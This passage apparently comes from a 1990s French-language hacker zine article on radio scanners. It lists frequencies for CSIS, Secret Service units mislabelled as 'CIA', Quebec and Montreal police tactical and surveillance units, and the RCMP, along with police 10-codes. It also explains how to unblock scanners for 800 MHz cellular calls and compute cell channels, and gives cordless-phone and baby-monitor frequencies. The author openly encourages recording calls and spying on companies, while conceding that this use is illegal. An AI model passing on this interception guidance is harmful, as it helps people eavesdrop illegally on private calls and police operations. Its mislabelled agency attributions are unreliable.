cette article et qui complète quelques une de mes techniques autrement dit une bonne affaire... Et Vous la dedans? Ne sachant même pas si quelqu'un a quelque part lis mon article ou vous le sautez tous eh. Vous pourriez scanner un peu ca serais bien pareil comme le scanne de numéro de téléphone si on réussirait a trouver des compagnie petite ou grosse on pourrais certainement trouver de très bonne utiliser avec cela et si vous participer on affichera tous ca sur le site ou encore dans un mag a venir qu'en dites vous? J'Aimerais bien avoir des réponses SVP alors n'hésiter pas a m'écrire et même si c'est pour autre choses que cela alors je vous souhaite une bonne lecture et penser a cela... Enjoy it Again! Notes: Certaine chose(cellulaire dans cet article) sont peut-être un peu dépassé et peut-être quelques une de ces ondes ne sont plus ce quel sont , je dirais que cela devrais être rare sinon veiller me le dire merci.... Et aussi je tient a dire que je prend mes infos dans le livre: HARRUTEQ Scanner Book, Québec Éditions Disclamer: Mouin bien vous le savez si vous êtes quelqu'un qui a pas d'affaire a lire ceci;Police ,GRC etc...passer dont cet article car vous le saviez bien que ce n'est que de l'information et rien de plus! La Loi et les récepteur a balayage (scanner): Le Canada est unique en reconnaissant que "le spectre de radio-frequence est une ressource vitale publique dont bénéficient les possesseurs de permis en y ayant accès et en y utilisant les fréquences" De plus ces utilisateurs paient pour leur permis, Augmente les revenus du trésor (caliss) en plus de contribuer au plaisir de les écouté :). Les règlements les plus particulier pour nous sont: 4. (1) Il est interdit, sans une autorisation de radiocommunication et sans en respecter les conditions, d'installer de faire fonctionner ou de posséder un appareil autre: (B) Qu'un appareil qui ne peut que recevoir de la radiocommunication et n'est pas une entreprise de réception de radiodiffusion. 9. (1) Il est interdit: (B) sans excuse légitime,de gêner ou d'entraver la diocommunication. 9. (2) Sauf exception réglementaire, il est interdit d'intercepter et soit d'utiliser soit de communiquer toute radiocommunication -- autre que la radiodiffusion -- sans l'autorisation de l'émetteur. En d'autre mots: - Les balayeur sont légaux ainsi que leur écoute. - Aucune fréquence limite -- Pas de permis requis - Il est interdit d'utiliser les information entendues a des fins personnelles - Il es interdit de divulguer toutes communications entendues... Pour les aspects techniques veiller vous referez a l'article Scanner D'ondes dans Le PyroFreak #8 et pour vous faire une antenne aller voir dans le PyroFreak #9 So Enjoy it! -- Fréquences Secrètes -- Bon sûrement le plus intéressant qui je vous le dit jais tirer ca du magazine Net-Mag qui ce vend assez cher fak acheter pas ca :) et du site très bon pour fréquence:http://hlm.le-village.com/suburban et aussi http://altern.org/suburban/ qui je crois est le même site :) et dans les link sur ce site il y a le site de VE2VGA qui a fais le texte qui est plus bas... Alors comme vous si savez si on ce donnela peine de chercher un peu on peu très bien trouver quelque chose de bien même que le gouvernement donne ces fréquences et plein d'autre truc qui peu nous être utile c'est ca qui arrive quand ya trop de lois et de règlements! - Fréquences de la CIA ,SCRS ,GRC et Police...- Alors peut-être si vous avez déjà écoute des fréquences de police vous en reconnaîtrai Et bien sur d'autre que vous savez sûrement pas :) Notes: -Fréquences souvent codées Service Canadien du Renseignement de Sécurité (SCRS) 421.8875MHz 421.9875MHz 422.0875MHz 421.9375MHz 422.0625MHz 425.7375MHz CIA Noms Fréquences Descriptions Able 32.230MHz WHCA Transportation Alpha 166.5125MHz Escort and security Baker 165.7875MHz Field offices (nationwide)/Pres/VP/VIP Escorts Charlie 165.3750MHz Field offices primary/command post(nationwide) Delta 169.9250MHz WHCA vans / phone patches / Marine Service Detachment Echo 407.850MHz Air Force 1/2 phone patch (uplink) Foxtrot 415.700MHz Air Force 1/2 phone patch (downlink) Golf 166.4000MHz Field offices (nationwide)(Charlie repeater input) Hotel 165.6875MHz WHCA VP staff / White House garage Hotel 166.2125MHz Presidential protection Hotel 167.900MHz WHCA VP staff / White House garage India 166.200MHz Headquarters / Presidential protection India 407.925MHz Headquarters /Presidential protection / Treasury Juliet 170.000MHz Camp David paging Kilo 167.825MHz Presidential residence(LBJ) phone (duplex) Lima 168.7875MHz Presidential residence(LBJ) phone (duplex) Lavender 418.125MHz WHCA Transportation Mike 165.2125MHz Former President and dignitary protection November 166.7000MHz WHCA White House Staff Oscar 164.8875MHz Presidential protection(primary) Papa 164.4000MHz Field offices / White House perimeter patrols Quebec 166.7000MHz White House staff Romeo 166.4000MHz X-Ray repeater input Sierra 165.5125MHz WHCA White House Staff / pagers Tango 164.6500MHz Field offices / Pres/VP protection Uniform 165.0875MHz AF1 Communications Uniform 361.600MHz AF1 Communications Victor 164.1000MHz WHCA Pres/VP protection Whiskey 167.0250MHz Paging X-ray 166.4625MHz Treasury common Yankee 162.6875MHz Air Force 1/2 phone patch (uplink) Zulu 171.2875MHz Air Force 1/2 phone patch (downlink) Noms Sortie Entrée Descriptions Green 415.750MHz 407.875MHz Training division Black 415.100MHz 418.325MHz Training division Blue 414.800MHz --- Training/protective support divisions Violet 415.875MHz --- Training division Gray 415.800MHz --- Protective support division Gold 415.675MHz 419.075MHz Communications division Black 415.675MHz --- Executive protection division Orange 414.950MHz --- Executive protection division Tan 414.850MHz --- Foreign Mission divisions Brown 414.850MHz 418.800MHz Uniformed division Red 415.975MHz 419.725MHz Foreign Mission/Uniformed divisions Silver 415.650MHz 419.100MHz Foreign Mission/Uniformed divisions Gray 418.350MHz 407.750MHz Uniformed division Orange 418.775MHz 414.950MHz Uniformed division Yellow 414.675MHz 418.150MHz Uniformed/Technical security divisions Green 419.725MHz --- Technical security division Technical security division (usage spécial) NOMS FRÉQUENCES DESCRITIONS F1 408.000 MHz RF Alarm F2 411.000 MHz RF Alarm F3 408.500 MHz Tracker (F1) F4 408.975 MHz Tracker (F2) Microphones sans-fil (radios portables) # FRÉQUENCES 1 406.2625 MHz 2 407.825 MHz 3 407.875 MHz 4 407.975 MHz Presidential Nighthawk Aircraft Fleet (HMX) Fréquences Descriptions 46.750 MHz Helicopter ops/transport (primary) 46.700 MHz Helicopter ops (secondary) 46.800 MHz Helicopter ops (alternate) 34.350 MHz VIP transport net 375.000 MHz Transport 142.750 MHz Command post 265.800 MHz Squadron common Limousines (local-DC) (duplex) Entrée 408.450 MHz Sortie 407.850 MHz FREQUENCE DE LA SQ F1: 166.800MHz F2: 166.500MHz F3: 167.040MHz F4: 166.620MHz F5: 167.010MHz F6: 166.740MHz F7: 167.340MHz F8: 166.680 MHz F9: 166.830 MHz F10: 166.650 MHz F11: 166.635 MHz F16: 152.510 MHz F17: 152.525 MHz F18: 152.540 MHz F20: 154.220 MHz F21: 154.680 MHz F23: 154.740 MHz F25: 153.920 MHz Fréquences: Description: 166.8300 MHz Poste St-Romuald, Rive sud 167.0100 MHz Poste Quebec-Metro, Rive nord 166.5000 MHz Poste St-Anne Beaupre et Porneuf 167.0400 MHz Quartier general et urgence 166.6800 MHz Quartier general 166.8000 MHz Quartier general Notes: Ces fréquences sont régulièrement brouiller 410.8125 MHz Groupe Tactique D'intervention 411.4625 MHz Groupe Tactique D'intervention 411.5125 MHz Groupe Tactique D'intervention 413.0125 MHz Groupe Tactique D'intervention Notes: Ces fréquences sont utiliser lors d'opération d'envergure comme celles du groupe Tactique d'Intervention 171.1800 MHz Auto Patrouille, service radar 172.0200 MHz Walkie-talkie - Leurs portatifs Récepteur 1 a 3 454.475MHz 454.550MHz 454.400MHz - Fréquence de leurs Hélicoptère 154.980MHz - Les fréquences de la SPCUM - 1- 1: 410.1125MHz (district 11 a 15 et 21-22) 1- 2: 410.2526MHz (auxiliaire) 1- 3: 410.3625MHz (district 23-24-25-32-33-34) 1- 4: 410.4875MHz (1-31-43-44) 1- 5: 410.6125MHz (district 45-51-52-53-54-55) 1- 6: 410.7875MHz (auxiliaire) 1- 7: 410.9125MHz (général) 1- 8: 410.6625MHz (simplex) 1- 9: 412.6875MHz (opérations spéciales) 1- 10: 411.3125MHz (opérations spéciales) 1- 11: 412.1375MHz (opérations spéciales) 1- 12: 410.0125MHz (opérations spéciales) 4- 1: 411,1875 MHz (centre opérationnel) 4- 2: 418,2125 MHz (surveillance physique) 4- 3: 411,5375 MHz (groupe tactique) 4- 4: 418,7375 MHz (surveillance physique) 4- 5: 418,7875 MHz (surveillance physique) 4- 6: 418,1875 MHz (surveillance physique) Communications numériques (4800 bps sur terminaux MDI) (Pas sur de la vitesse si est bonne!) D1: 410,0375 MHz D2: 410,3375 MHz D3: 410,8125 MHz D4: 411,2125 MHz 411.4375 MHz (Sécurité de la STCUM (C.O.S) Transit security) 411,2375 MHz (Mesures d'urgences (BMU) Emergency measures) - Fréquences de l'armée canadienne - 34.700MHz 38.600MHz 38.900MHz GRC Les Fréquences de la GRC sont généralement dans les bandes 139 et 140MHz Fréquences: Descriptions: 139.1400MHz Utilisation locale seulement 139.1700MHz Utilisation locale seulement 139.7100MHz Utilisation générale 139.7400MHz Utilisation locale seulement 139.8000MHz Utilisation générale 139.8300MHz lien avec Mont Magantic 139.9800MHz Sécurité aéroport de Québec 461.0750MHz Urgence aéroport de Québec 140.3700MHz Utilisation locale seulement 140.6700MHz Utilisation locale seulement 140.7600MHz Utilisation générale 422.0875MHz Utilisation générale POLICE Notes: Ces fréquences sont un peu veille et je les ai pas tester alors a vous de checker de toute façon ils devraient toute marcher peut-être à part les voirie EXTERIEUR REGION DE QUEBEC: Villes: Description: Fréquences: Baie St-Paul Pompier 154.3250MHz Voirie 159.2100MHz Beauceville Voirie 167.0400MHz Black Lake Police et Pompier(same) 154.175/154.8600MHz Voirie 169.2600MHz Clermont Police et pompier(same) 154.6500MHz Voirie 169.2300MHz Cowansville Pénitencier Fédéral 151.5200MHz 150.6050MHz 149.8300MHz Deschaillons --- --- Disraeli Police 158.9700MHz Pompier et Voirie(same) 159.1200MHz Donnacona Police et Pompier(same) 158.9700MHz Voirie 169.4400MHz Pénitencier Fédéral 151.5200MHz 150.6050MHz 149.83/167.550MHz Dosquet Voirie 155.6400MHz Lac Etchemin Pompier et Voirie(same) 168.7800MHz Laval Pénitencier 151.055/151.4750MHz Lyster Pompier et Voirie(same) 159.4500MHz Malbaie Police et Pompier(same) 151.2350MHz Voirie 167.4500MHz Montmagny Police et Pompier(same) 158.9700MHz --| Voirie 169.1400MHz --| |---> Same? comme plusieur autre... Neuville Pompier et Voirie(same) 155.1900MHz | | Plessisville Police et Pompier(same) 158.9700MHz --| Voirie 169.1400MHz --| Port-Cartier Pénitencier Fédéral 150.6050MHz 149.8300MHz 151.5200MHz Portneuf Voirie 169.2300MHz St-Agapit Police et Pompier(same) 153.9500MHz St-Damien Pompier et Voirie(same) 169.2300MHz St-Etienne Pompier et Voirie(same) 169.2300MHz St-Georges Police Est 158.9700MHz Police Ouest 158.8200MHz Pompier 158.9700MHz Voirie 169.08/164.9400MHz Officiel 169.86/169.9400MHz St-Joseph Police et Pompier(same) 154.2950MHz Voirie 169.5000MHz St-Marc-des- Pompier 164.9400MHz Carrieres Voirie 164.9400MHz Ste-Anne-des- Pénitencier 151.475/413.9375MHz plaines Ste-Croix Voirie 143.0250MHz Ste-Marie Police et Pompier(same) 154.2650MHz Voirie 158.9850MHz Officiel 153.8900MHz St-Michel Police(SQ) 166.8000MHz St-Raymond Police et Pompier(same) 154.0400MHz Voirie 269.0500MHz Thetford Mines Police et Pompier(same) 412.9750MHz Voirie 169.9750MHz Officiel 154.65/155.7600MHz REGION DE QUEBEC: Villes: Description: Fréquences: Ancienne-Lorette Police et Pompier(same) 151.1450MHz Voirie 169.3500MHz Beauport Police et Pompier(same) 155.280/155.6100MHz Voirie 169.7400MHz Beaupre --- --- Berniere Pompier 151.2650MHz Boischatel Pompier et Voirie(same) 151.2650MHz Canadien National Police 160.5750MHz Canadien Pacifique Police 159.8850MHz Cap-Rouge Police et Pompier(same) -Voir St-Foy- Voirie 169.4700MHz Charlesbourg Police 412.1125/412.8125MHz Pompier 154.8300MHz Voirie 169.4700MHz Charny Police et Pompier(same) 154.1300MHz Voirie 168.7800MHz Chateau-Richer Voirie 159.2700MHz Lac Beauport Pompier et Voirie(same) 151.5350MHz Lac St-Charles Pompier 155.1900MHz Lauzon Police et Pompier(same) 412.3875MHz Voirie 169.1700MHz Levis Police 412.9875MHz Pompier 413.5125MHz Voirie 169.440/.140/.230MHz Loretteville Police 412.9625MHz Pompier 412.5875MHz Voirie 151.235/413.4875MHz Port de Quebec Police 154.4000MHz Voirie 167.6100MHz Quebec Police r:155.5800MHz g1:155.7900MHz g2:155.4000MHz e1:155.8500MHz e2:155.1300MHz f:155.8800MHz rs:154.7100MHz fs:154.7700MHz Pompier 154.250/155.520/154.340MHz Voirie 169.890/169.590MHz St-Augustin Pompier 410.0125MHz Voirie 168.7800MHz St-Ferreol des Voirie 163.5000MHz neige St-Romuald Police 154.6500MHz Pompier et Voirie(same) 155.0400MHz Ste-Foy Police et Pompier(same) 412.3125/412.9125MHz 413.3125MHz Voirie 169.110/169.5300MHz Shannon Pompier et Voirie(same) 173.46/.64/.82MHz Sillery Police et Pompier(same) 155.9700MHz Voirie 410.0375MHz Stoneham Pompier et Vorie(same) 143.0250MHz Universite Laval Securite 159.3000MHz Val-Belair Police ??? Pompier 412.4875MHz Voirie 411.6875MHz Valcartier Police 173.2500MHz Base Millitaire Pompier 173.460/173.3500MHz Voirie 173.6700MHz Valcartier Village Pompier et Voirie(same) 170.9400MHz Vanier Police et Pompier(same) 412.0125MHz Voirie 410.0875MHz Village Huron Police 154.9200MHz Pompier et Voirie(same) -Voir Loretteville- Bon ca a peu près ca pour les fréquences "Secrètes" comme vous avez du constater c'est pas si secret que cela!! Pareil que les site Internet secrets que vous verrez ou que vous avez déjà vu dans ce mag. - Conclu - Sur le site (http://hlm.le-village.com/suburban/) vous pourrez voir d'autre codes 10 et vous verrez que la SPCUM et la SQ sont assez différent comme vous savez :) aussi il y a plein d'autre fréquences armée cinéma hôpitaux et autre... Il y a aussi de plan d'intercepteur-décodeur de pagette que je vous donnerai peut-être la prochaine fois Press Down (to continu) -- Codes 10 Corriger et SPCUM en prime -- C'est les codes du dernier mag mais j'en ai rajouter quelques un que j'avais pas dans ceux de la SQ et j'ai laisser la RCMP la juste comme cela :) Sûreté: RCMP: 10-1 A l'écoute 10-4 message compris 10-2 Répéter votre message 10-5 en attente (stand-by) 10-3 Canceller 10-7 hors des ondes 10-4 Message compris (terminer) 10-8 retour en ondes 10-5 Accident matériel 10-9 répéter 10-6 Accident avec blesser , mort 10-12 en route 10-7 Hold-up 10-20 en position 10-8 Barrage routier(Road Block) 10-21 appeler par téléphone 10-9 Position et direction 10-27 vérification permis de conduire 10-10 Message général 10-28 vérification immatriculation 10-11 Immobilisez véhicule et prenez 10-29 vérification de dossier message 10-45 retour au bureau 10-12 Individu 10-99 portatif 10-13 Appelez par téléphone 10-14 Besoin d'assistance 10-15 Message confidentiel 10-16 Rapport préliminaire 10-17 État des routes 10-18 Hors des ondes + (la ou les raison) 10-19 Retour en ondes 10-20 Repas (Donner numéro de téléphone) 10-21 Téléphone 10-22 Enquête 10-24 Appelez au quartier général 10-25 Repas B.F.C Bureau des enquêtes criminelles B.S.R Bureau de la sécurité routière D.P.J Directeur de la protection Jeunesse ERAM Escouade Alcool & Moralité DBO Demande de vérification d'objet DVQ Demande au Bureau Véhicules du Qc DVQ#1 vérification par plaque DVQ#2 vérification par le nom + date de naissance DVQ#3 vérification pour dossier DVQ#4 vérification par numéro de série DPE Vérification de dossier DPL Vérification de plaque FPS Dossier criminel -SQ code 100- 20 Opération cent 21 Priorité radio 22 Silence radio 23 Communication en simplex 24 Opération termine 25 Opération poursuivie 26 Interceptez Véhicule suspect 27 Agir avec prudence 28 Sans sirène ni clignotant 29 Demande renfort 30 URGENCE 31 Fusillade 32 Vol a main armer 33 Personne jugée dangereuse 34 Enlèvement 35 Évasion 36 Prise D'otage(s) 37 Émeute 38 Alerte a la bombe 39 Désastre aérien 40 Homicide 41 Incendie 42 Attroupement Illégal 43 Délit de fuite 44 Facilites affaiblies 45 Transport de détenu(s) SPCUM: Requêtes informatisées (partiel) BVQ: (type 1) par immatriculation BVQ: (type 2) par le nom BVQ: (type 3) par permis de conduire BVQ: (type 4) par numéro de série COM: Message au C.I.P.C. DAF: Vérification au fichier d'armes à feu DBA: Vérification au fichier des bateaux DBO: Vérification au fichier des objets DDE : Vérification au fichier personnes par la fiche dentaire DMO: Vérification au fichier des bateaux moteur DPE: Vérification au fichier des personnes DPI: Vérification au fichier des pièces DVA: Vérification au fichier des valeurs DSV: Demande spéciale au fichier des véhicules DVQ: Demande au bureau des véhicules du Québec FPS: Vérification au fichier des dossiers judiciaires ou criminels MEUR: Message urgent à transmettre (terminaux MDI) Codes 10 du SPCUM 10-01: Essence/huile 10-02:Repas 10-03: Réparation mécanique 10-04:Réparation radio 10-05: En service 10-06: Répéter dernier message 10-07:Besoin d'aide - urgent 10-08: Hors service 10-09:Donner votre position 10-10: Annuler message / appel 10-11: En route 10-12: Sur les lieux 10-13:Transport de détenu 10-14: Pratique de tir 10-15: Lavage de véhicules 10-16: Message 10-17: Remorquage requis 10-18 ou 10-19: Administration (appelez au poste) 10-19: Appelez votre poste 10-20: Accident 10-21: Uniforme 10-24: Agir avec prudence 10-25: Peut parler librement? (infos confidentielles) 10-26: 10-27: possible "changez canal 7 " 10-36: Canceller 10-37 10-37: Bouton Panique terminaux et walkie-talkie Codes généralement utilisés par le SPCUM Abréviations: BL - Blessés EL - Élections (nouveau depuis 1995) IV - Ivresse MM - malade mental SA - suspect armé SP - suspect possible SF - suspect en fuite SU- suspect sur les lieux VC - Violence conjugale X,XE - jeune enfant Classification des codes 001: Homicide Meurtre 006: Homicide Tentative 014: 018: Vol qualifié 021: Vol sur la personne 022: Introduction par effraction 026: Véhicule Vol 032: Bicyclette volée 033: Vol dans véhicule 034: Vol à l'étalage 035: Vol Autres 037: Vol de bicyclette 041: Recel 042: Fraudes 050: Jeu et paris 054: Personne armée 055: Explosifs trouvés 061: Personne recherchée 063: Troubler la paix 064: Évasion 065: Actions indécentes 071: Méfaits, biens privés 072: Méfaits, biens publics 073: Infraction au code criminel 111: Accident Délit de fuite 116: Capacité conduire affaiblie 204: Agression sexuelle 211: Voies de fait contre agent 212: Voies de fait 214: Prise d'otages 222: Visites de contrôle 250: Émeute 255: Explosion 316: Ivressomètre 333: Information/cas référé 400: Alarme sans précision 401: Alarme cambrioleur 402: Alarme hold-up 403: Alarme non fondée 404: 407: Assistance à huissier 409: Coup de feu 410: Semblerait être variante de 409 426:Véhicule sans permis 444: Enquête - lieux publics 445: Enquête - lieux privés 455: Substance dangereuse 465: Rencontrer dépanneuse 481: Enfant abandonné ou maltraité 486: Excavation dangereuse 491: Fil brisé (RC avec Hydro-Québec) 492: Drogue et stupéfiants 499: Non fondé 555: Radar ("patrouille mixte") 600: Billet de circulation 601: Contrôle de circulation 607: Appel à la bombe 608: Colis suspect trouvé 609: Bruit 610: Conflit 611: Manifestation 612: Différent ouvrier 613: Coopérer/rencontrer 615: Incendie 616: Personne à expulser 617: Personne dans le besoin 618: Personne égarée 619: Personne malade mental (MM) 620: Personne à aviser 621: Personne gisante 622: Garde de détenu 626: Véhicule abandonné 630: Dommage à la propriété 631: Morsure d'animal 632: Animal mort, perdu, blessé 638: Bagarre 640: Plaque perdue/volée 641: Plaque trouvée/retrouvée 643: Objet perdu 644: Objet trouvé/retrouvé 645: Menace/harcèlement 655: Fuite de gaz 699: Non localisé 807: 10-07 transmis par tiers 901: Personne blessée/malade 902: Décès 903: Disparition rapport 905: Accident 907: Assistance à... 922: Tentative de suicide 923: Personne disparue localisée 933:Info d'intérêt policier 926: Véhicule retrouvé 944: Poursuite active (code retiré?) 973 :Autre incident 999: Police demandée sans précision -- Les ondes et les cellulaires ,Sans fil ET + -- Notes: Tout ou presque ceci peux ce relier au ondes a la fin de l'article (Téléphone) Les ondes des téléphones cellulaires on les retrouves dans la bande 800Mhz. Plusieurs scanner peuvent capter ces fréquences. Car certains modèle sont modifier par le fabriquant pour bloquer la réception de ces fréquences.Mais il est possible de débloquer la réception des cellulaires sur la plupart des modèles modifier. Vous avez juste a vous informer a votre vendeur ou chez Radio Shack quelque part comme ca, il vont vous le dire. Si vous ne voulez pas investir pour le faire modifier ou le faire vous mêmes le truc des fréquences image s'applique ici (PyroFreak #8). Additionner le numéro magique et le tour est jouer! Si votre appareil n'est pas fabriquer pour la bande 800Mhz il en est impossible de le modifier. Tout n'est pas perdu il existe des convertisseurs de fréquences avec lesquels vous serez capable de capter la bande 800Mhz. Ils se connectent entre le récepteur et l'antenne. En général il suffit d'ajouter 400Mhz dont pour capter la fréquence 855.0000, il faudra programmer 455.0000 . L'inconvénient de ce système est que si un signal est émis a 455.0000 est capter par l'appareil, il peut devenir ennuyant écouter deux conversations a la fois. Les convertisseurs sont annoncer dans les magasins spécialiser et chez les vendeur de scanner. Il y a quelques années(vu de la date de mes infos :) ) Au état et au Canada il y avais environ 832 fréquences allouées pour le services de téléphone cellulaires et d'autre fréquences additionnels sont prévues pour le futur. Le système de contrôle par ordinateur choisit une paire de fréquence (mobile et base), la meilleur parmi chacune des 416 fréquences de Bell cellulaire ou Cantel & Cie. Ainsi le signal faiblit , l'ordinateur interroge les cellules environnantes pour transférer la conversation sur une autre paire de fréquences qui capte mieux le signal. Tout cela ce fait en une fraction de seconde sans que la conversation ne soit interrompue. La base transmet les deux cotes de la conversation (mobile et base), ce qui peut surprendre les usagers de ce système. Beaucoup de gens sont sur l'impression que les conversations a partir de téléphones cellulaires sont totalement privées et qu'il est interdits de les écouter. Ce qui n'est vraiment pas le cas. Une autre affaire que les usager nesavent pas non plus des propriétaire de téléphones cellulaires c'est qu il est interdit d'utiliser un langage obscène ou discriminatoire sur les ondes publiques. La pénalité pour une telle offense est de 1'000$ ou 6 mois de prison.(Caliss que ces mal faites la justice ca ce peut pas!)Même que la GRC a déjà faites des saisis un peu partout au Canada. Mais vous ne pouvez avertir personne car il est interdit de divulguer ce qu'on entends sur les ondes... Et même il y a des scanners qui on des plug pour mettre une enregistreuse qui s'active a chaque fois quelle entend une voix alors ceci peut être très mais très intéressant :) Et aussi il est possible que si vous pouvez capter une fréquence et cellulaires que la personne qui a le cellulaire puisse le savoir alors peut- être que des compagnies monte des ti coup monte comme donner des "bon tuyaux" pour tel ou tel affaire et vous pouvez vous faire avoir si vous vous rendez compte que ca existe pas ou que vous faites beaucoup d'argent et blablabla... Bon alors pour pouvoir capter des fréquences de téléphones cellulaires, scanner dans les 80Mhz et quand vous capter une fréquence vous l'inscrivez dans une de vos mémoire et quand vous écouter cette fréquence et que les ondes coupe alors peser sur search pour retrouver la même fréquence qui a changer de place comme je lai expliquer plus haut... d'habitude les fréquences seront espacer d'environ 30 ou 45 Mhz. Alors je vais vous donner quelques fréquences de cellulaire en plus que ceux de VE2VGA qui ce retrouve plus loin... Alors la compagnie Cantel ces ondes se situe environ: de 825.030MHz a 834.990MHz en mobile de 870.030MHz a 879.990MHz en base Et Bell: de 835.020MHz a 844.980MHz en mobile de 880.020MHz a 889.980MHz en base Comme je le disais plus haut pour trouver ces fréquence un calcul ce fais. En mobile ou en base 30KHz séparent les canaux et entre les mobile et la base 45MHz (Pour le canal 30: 30 fois 30KHz = 900KHz) mobile: canal 30 825MHz + 900KHz = 825.900MHz base: canal 30 825MHz + 45MHz + 900KHz = 870.900MHz L'écoute doit ce faire sur la base D'habitude les 21 premier canaux sont réserver pour des information crypter donc illisible et servent sûrement a la compagnie... Pour le satellite MSAT les fréquences sont: Fréquences D'entrées: 821MHz a 825MHz Fréquences de sortie: 866MHz a 870MHz - Bon alors je le téléphone sans fils - Le téléphone sans fil se retrouve dans les 40MHz...Depuis 1984 cette bande est utiliser et avant cela les fréquences se situaient entre 1.6 et a.8MHz Combine: Base: Canaux: 49.670 46.610 01 49.770 46.710 04 49.830 46.770 06 49.830 1600Khz avant 1984 49.845 46.630 02 49.845 1710KHz 07 --- avant 1984 49.860 46.670 03 49.860 1730KHz 13 avant 1984 49.875 46.730 05 49.875 1750KHz 19 avant 1984 49.890 46.830 07 49.890 1770KHz 25 avant 1984 49.930 46.870 08 49.930 1690KHz 01a avant 1984 49.970 46.970 10 49.970 1800KHz --- avant 1984 49.990 46.930 09 avant 1984 Il faut aussi savoir que les fréquences 49.830MHz 49.845MHz et 49.875MHz sont également utilisées dans des systèmes d'interphone de surveillance (babysiter). Aussi, les walkie-talkie 49MHz opèrent entre 49.830 et 49.990MHz Alors avec ceci quoi de bon que de pouvoir espionnez des Cie ou n'importe quoi qui peut être bon pour vos "plan" Ca fais simplement une manière de plus d'avoir des infos...y s'agit seulement de capter un technicien de réseau ou quelque personne dans ce style qui détiennent des informations et c'est bien plus simple non? Malgré que oui faut la trouver cette fréquence :) -- Satellite -- Bon il n'est pas requis d'avoir de l'équipement spéciale pour capter ces ondes. Une petite antenne horizontale peut faire l'affaire. Pour la majorité des fréquences l'antenne devra être oriente vers lest. Puisque la majorité des satellite inscrit dans es livre comme le mien sont situer au dessus de l'océan. La meilleur réception se fais entre 10H00am et 14H00Pm. On recommande l'empli de amplificateur d'antenne les signaux étant faible. Assurez vous que l'amplificateur soir adapter pour les bandes VHF et UHF de 50 a 900MHz. De cette façon l'amplificateur pourra servir pour la majorité des fréquences de votre appareil. Et vous devriez avoir aussi un "Switch Box" Le fais de disconnecter la prise de courant aucun ondes ne passera dans l'amplificateur. Notes: Ce satellite est relier a une des agence secrète plus haut mais je ne sais plus laquelle alors vous avez juste a essayer. 931.9375 MHZ **************************************************************************** -- Diverses liste de Fréquences -- Notes: Par Neuro Crédit: Guy, VE2VGA Téléphones sans fils domestiques BASE MOBILES MODELES, NOTES, DETAILS, ETC 902.10000 926.10000 PANASONIC KXT-9000, CH.01 ( MODELES 60 CANAUX , 902.13000 926.13000 PANASONIC KXT-9000, CH.02 NUMERIQUE ) 902.16000 926.16000 PANASONIC KXT-9000, CH.03 902.19000 926.19000 PANASONIC KXT-9000, CH.04 902.22000 926.22000 PANASONIC KXT-9000, CH.05 902.25000 926.25000 PANASONIC KXT-9000, CH.06 902.28000 926.28000 PANASONIC KXT-9000, CH.07 902.31000 926.31000 PANASONIC KXT-9000, CH.08 902.34000 926.34000 PANASONIC KXT-9000, CH.09 902.37000 926.37000 PANASONIC KXT-9000, CH.10 902.40000 926.40000 PANASONIC KXT-9000, CH.11 902.43000 926.43000 PANASONIC KXT-9000, CH.12 902.46000 926.46000 PANASONIC KXT-9000, CH.13 902.49000 926.49000 PANASONIC KXT-9000, CH.14 902.52000 926.52000 PANASONIC KXT-9000, CH.15 902.55000 926.55000 PANASONIC KXT-9000, CH.16 902.58000 926.58000 PANASONIC KXT-9000, CH.17 902.61000 926.61000 PANASONIC KXT-9000, CH.18 902.64000 926.64000 PANASONIC KXT-9000, CH.19 902.67000 926.67000 PANASONIC KXT-9000, CH.20 902.70000 926.70000 PANASONIC KXT-9000, CH.21 902.73000 926.73000 PANASONIC KXT-9000, CH.22 902.76000 926.76000 PANASONIC KXT-9000, CH.23 902.79000 926.79000 PANASONIC KXT-9000, CH.24 902.82000 926.82000 PANASONIC KXT-9000, CH.25 902.85000 926.85000 PANASONIC KXT-9000, CH.26 902.88000 926.88000 PANASONIC KXT-9000, CH.27 902.91000 926.91000 PANASONIC KXT-9000, CH.28 902.94000 926.94000 PANASONIC KXT-9000, CH.29 902.97000 926.97000 PANASONIC KXT-9000, CH.30 903.00000 927.00000 PANASONIC KXT-9000, CH.31 903.03000 927.03000 PANASONIC KXT-9000, CH.32 903.06000 927.06000 PANASONIC KXT-9000, CH.33 903.09000 927.09000 PANASONIC KXT-9000, CH.34 903.12000 927.12000 PANASONIC KXT-9000, CH.35 903.15000 927.15000 PANASONIC KXT-9000, CH.36 903.18000 927.18000 PANASONIC KXT-9000, CH.37 903.21000 927.21000 PANASONIC KXT-9000, CH.38 903.24000 927.24000 PANASONIC KXT-9000, CH.39 903.27000 927.27000 PANASONIC KXT-9000, CH.40 903.30000 927.30000 PANASONIC KXT-9000, CH.41 903.33000 927.33000 PANASONIC KXT-9000, CH.42 903.36000 927.36000 PANASONIC KXT-9000, CH.43 903.39000 927.39000 PANASONIC KXT-9000, CH.44 903.42000 927.42000 PANASONIC KXT-9000, CH.45 903.45000 927.45000 PANASONIC KXT-9000, CH.46 903.48000 927.48000 PANASONIC KXT-9000, CH.47 903.51000 927.51000 PANASONIC KXT-9000, CH.48 903.54000 927.54000 PANASONIC KXT-9000, CH.49 903.57000 927.57000 PANASONIC KXT-9000, CH.50 903.60000 927.60000 PANASONIC KXT-9000, CH.51 903.63000 927.63000 PANASONIC KXT-9000, CH.52 903.66000 927.66000 PANASONIC KXT-9000, CH.53 903.69000 927.69000 PANASONIC KXT-9000, CH.54 903.72000 927.72000 PANASONIC KXT-9000, CH.55 903.75000 927.75000 PANASONIC KXT-9000, CH.56 903.78000 927.78000 PANASONIC KXT-9000, CH.57 903.81000 927.81000 PANASONIC KXT-9000, CH.58 903.84000 927.84000 PANASONIC KXT-9000, CH.59 903.87000 927.87000 PANASONIC KXT-9000, CH.60 903.00000 927.00000 SAMSUNG SP-R912 ( MONOFREQUENCE ) 75.97500 49.68000 TÉLÉPHONES SANS FILS 1-L (MODELES SPECIAUX IMPORTES 75.95000 49.71000 TÉLÉPHONES SANS FILS 2-L - RARES) 75.92000 49.74000 TÉLÉPHONES SANS FILS 3-L 75.90000 49.80000 TÉLÉPHONES SANS FILS 4-L 75.87000 49.77000 TÉLÉPHONES SANS FILS 5-L 75.85000 49.62000 TÉLÉPHONES SANS FILS 6-L 75.82500 49.65000 TÉLÉPHONES SANS FILS 7-L 75.80000 49.59000 TÉLÉPHONES SANS FILS 8-L 75.77500 49.56000 TÉLÉPHONES SANS FILS 9-L 75.75000 49.53000 TÉLÉPHONES SANS FILS 10-L 49.65000 26.51000 TÉLÉPHONES SANS FILS MODELE INCONNU ( RX ) 1.69000 49.83000 TÉLÉPHONES SANS FILS ( ANCIENS MODELES - CANAL 1A 